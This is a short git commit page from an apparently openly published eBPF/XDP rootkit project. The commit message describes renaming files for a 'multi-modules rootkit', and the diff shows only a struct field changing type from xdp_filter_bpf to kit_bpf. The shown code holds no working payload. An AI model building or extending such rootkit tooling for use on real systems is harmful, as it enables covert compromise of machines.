Updated file names and directory structure to the new multi-modules rootkit

This commit is contained in:
h3xduck
2022-01-16 06:56:54 -05:00
parent fc0d30f06f
commit 3832d99af1
14 changed files with 603 additions and 609 deletions

View File

@@ -34,7 +34,7 @@ typedef struct module_config_t{
//Configuration struct. Used by the module manager to
//correctly attach the needed modules, providing necessary params
typedef struct module_config_attr_t{
struct xdp_filter_bpf *skel;
struct kit_bpf *skel;
struct xdp_module_attr {
__u32 ifindex;
__u32 flags;